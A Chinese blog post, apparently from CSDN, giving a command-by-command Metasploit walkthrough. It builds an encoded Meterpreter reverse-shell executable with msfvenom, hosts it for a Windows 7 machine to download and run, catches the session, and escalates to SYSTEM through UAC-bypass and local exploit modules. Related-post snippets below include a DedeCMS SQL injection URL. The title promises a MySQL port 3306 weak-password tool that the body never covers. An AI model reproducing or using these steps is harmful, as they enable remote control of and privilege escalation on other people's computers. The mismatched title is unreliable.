3306弱口令提权工具_kali 绕过uac提权

最新推荐文章于 2021-05-21 00:21:51 发布
最新推荐文章于 2021-05-21 00:21:51 发布
阅读量708 收藏
点赞数
文章标签: 3306弱口令提权工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39858132/article/details/112141971
版权

18cf1e8b86df078edb6ef679be3d2fc1.gif

1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe  --产生一个exe文件204c38d9d2912c4aaa20e0b09fddf614.png 

2. service apache2 start   --开启apache服务
3. service postgresql start --开启msf数据库服务
4. cp ./a.exe /var/www/html/ --在http目录下

535c73c9b618d1a24f52e9acb3bd3685.png 


5. 打开win7访问kali ip 下载a.exe

d0082ae01c36bdfcfb32ccab69b4b20a.png

13c28a4d2a5cff0677492749c3a36978.png 


6. Msfconsole           --启动msf

4e39e98865ebf0173b94c270239cb67d.png
7. use exploit/multi/handler   --使用这个模块

d240f2a73ca4c6016b5c3115717cf28e.png 


8. set payload windows/meterpreter/reverse_tcp  --配置payload

84ea455d4f6b8ec800ad3e443c0a30ec.png 

9. set lhost 192.168.2.128  --配置kali  ip

dc4704a851ef4b1a237c96953945ff1f.png 

10. set lport 4444    --配置监听端口 和exe文件端口一样


11. Show options   --查看一下参数

ccaa0043487130c1e0a46dc454cce11a.png 

12. exploit -j  --开始监听

85a414283523412a6b6f405a327e537a.png 


13. 然后在win7电脑上运行a.Exe

f6cdbd84a1a05bfa8bff624ba8a712ca.png 
14. 在kali上就会返回一个会话用sessions 查看

49b49f9213ca8250afffa270cc2fa9c0.png
15. sessions -i 1  --进入会话

9b254afb7dc0234d8c4f6f6826457c15.png 

16. load priv   --更新插件

8a835498a71c1c43e6ac9cf8ebe1c7a1.png 

17. Getsystem  --获取权限  发现没有权限 需要提权
18. Background --退出会话c32ce64d23c19493dab899ff18fc4ba0.png 


19. use exploit/windows/local/ask --进入提权模块

9ab270dc55c3d4f41acbcf499d18435d.png 

20. show options  --查看配置参数

b6f9c171a8bfd585d8e9d05f74962d46.png

 
21. set payload windows/meterpreter/reverse_tcp --设置payload

22. set lhost 192.168.2.128  --设置kali ip
23. set filename win_update.exe  --设置win弹窗名字
24. set filename win_update.exe --设置会话
25. show optionsd4f4853bde1e1e96cd648e388a075ab4.png 

26. Exploit  --攻击 会多一个会话
27. sessions -i 2  --进入会话

28. load priv 更新插件

29. Getsystem  --提权 

922304763da247ef4623179a559cd8b6.png 

--上边那个提权还要弹窗 接下来再说一个模块不需要用户在点击 “是”
30. use exploit/windows/local/bypassuac_injection
31. set payload windows/meterpreter/reverse_tcp
32. Set lhost 192.168.2.128
33. set session 1
34. exploit  --在得到一个提权的会话
35. 还有2个模块可以用提权以下是  模块和payload(参数配置如上)
36. use exploit/windows/local/ms13_053_schlamperei
set payload windows/meterpreter/reverse_tcp
37. use exploit/windows/local/ppr_flatten_rec
set payload windows/meterpreter/reverse_tcp-- set payload windows/viewomly/reverse_tcp
-- set viewonly no(这个payload可以用图型话界面 设置viewonly为 no可以操作)

4fa2178fd528dc9d0e9c1b310cc65f46.png

推荐文章++++

7fe8646bdd940b0d2743e11cf0dfc8e7.png

*Windows 下的提权大合集

*AXIS2 弱口令提权

*Windows低权限提权

fc3dd2b0b8e87ad72a9b9aa09a56fc73.png

b42b8eb6dec407ec497299524c9cf7dd.gif

weixin_39858132
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
3306 - 弱口令扫描工具
10-06
3306 - 弱口令扫描工具,3306 - 弱口令扫描工具, 弱口令扫描工具
3306MYSQL弱口令测试工具
09-11
3306MYSQL弱口令测试工具
3306 linux提权方法,3306弱口令怎么提权
weixin_26781975的博客
05-14 373
满意答案1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。第一步exec sp_dropextendedproc ...
3306提权工具7.0.rar
11-16
3306全自动liuxn提权 不建议WIN马 很方便
3306 mysql弱口令源码_玩蟹游戏漏洞打包(shell+SQL+mysql弱口令+源码泄漏)
weixin_33512961的博客
01-19 6242
DEDECMSSQL注入1.http://luanshiqu.playcrab.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c...
kali常用工具】无线信号搜索工具_kali更新
12-16
kali常用工具】无线信号搜索工具kali常用工具】无线信号搜索工具 搜索当前范围的所有的WIFI信号 以及强度列表
Linux使用suid vim.basic文件实现提权
09-14
然而,SUID权限也可能被恶意利用,例如在提权攻击中。本篇文章将重点讨论如何通过SUID的`vim.basic`文件来实现提权。 首先,我们要确保有一个SUID权限的`vim.basic`文件。在Kali Linux系统中,我们可以使用`chmod`...
metasploit下Windows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
mysql提权工具
04-24
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
phpmyadmin弱口令批量利用3传(ok)
06-29
phpmyadmin弱口令批量利用3传(ok) 批量执行,仅供网络测试
MYSQL高版本低版本UDF提权工具
06-20
MYSQL高版本低版本UDF提权工具 很好用的UDF提权使用 有两个版本
mysql的root弱口令 提权
weixin_30404405的博客
07-08 699
http://blog.sina.com.cn/s/blog_6ca7b58101013kt4.html 转载于:https://www.cnblogs.com/dongchi/p/4016216.html
推荐一款弱口令破解工具
weixin_39647062的博客
09-10 5759
工具(python)适合对大量IP地址进行弱口令破解。 代码 #coding:utf-8 #author:wolf@YSRC import getopt import sys import Queue import threading import socket import urllib2 import time import os import re import ftplib...
3306-批量Mysql提权,3306端口:手动入侵mysql写入启动项提权
weixin_35702533的博客
03-12 556
1、连接到对方MYSQL 服务器。首先你要下载phpnow百度有下载下来然后解压到C盘根目录,找到MySQL-5.1.50这个文件夹,再打开bin文件夹1、打开本地cmd命令提示框,输入命令cd C:\MySQL-5.1.50\bin 意思就是进入当前目录。然后就可以输入mysql命令了。然后输入:mysql -u 目标用户名,3306默认是root -h 目标ip地址 -p 回车例如:mys...
Metasploit - bypassuac
Nixawk
11-17 1256
Download: checkprivInstallation: cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rbmeterpreter > run checkpriv [*] Admin token: false [*] Running as SYSTEM: false [*] UAC Enab
3306-批量Mysql提权_MYSQL提权技巧 分享
weixin_31940835的博客
02-15 83
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
Linux 3306漏洞,3306提权linux服务器
weixin_32656107的博客
05-21 246
弹性云服务器 ECS弹性云服务器(Elastic Cloud Server)是一种可随时自助获取、可弹性伸缩的云服务器,帮助用户打造可靠、安全、灵活、高效的应用环境,确保服务持久稳定运行,提升运维效率三年低至5折,多种配置可选了解详情什么是弹性云服务器?||https://support.huaweicloud.com/productdesc-ecs/zh-cn_topic_0013771112....
Kali Linux提权渗透技巧全集:实战与进阶指南
标题:"Kali Linux学习:渗透与提权技巧总结大全" Kali Linux 是一个专门为安全测试和渗透研究设计的操作系统,以其丰富的工具集和广泛的渗透测试功能而闻名。本文旨在分享关于Kali Linux的学习经验和实用技巧,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值